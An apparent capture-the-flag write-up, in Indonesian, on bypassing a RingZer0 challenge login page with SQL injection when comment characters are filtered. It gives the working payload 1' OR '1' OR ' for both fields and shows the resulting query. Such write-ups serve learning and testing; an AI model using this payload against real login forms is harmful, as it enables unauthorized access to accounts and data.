Friday, December 7, 2018

[RingZer0] Don't mess with Noemie; she hates admin! - SQL INJECTION

disoal ini diberikan sebuah halaman login yang harus dibypass, saya menggunakan SQL INJECTION untuk membypass halaman tersebut.

saya mencoba menggunakan Query " ' OR 1-- " ternyata -- terdeteksi sebagai Illegal characters detected. dan # juga terdeteksi jadi saya tidak bisa menggunakan komentar.

jadi saya coba tanpa komentar, Query:
Username: 1' OR '1' OR '
Password: 1' OR '1' OR '

Kalau di digabungkan seperti ini:

SELECT * FROM users WHERE username = '1' OR '1' OR '' AND password = '1' OR '1' OR ''

setelah itu submit maka flag akan muncul.
Posted by at
Labels: ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)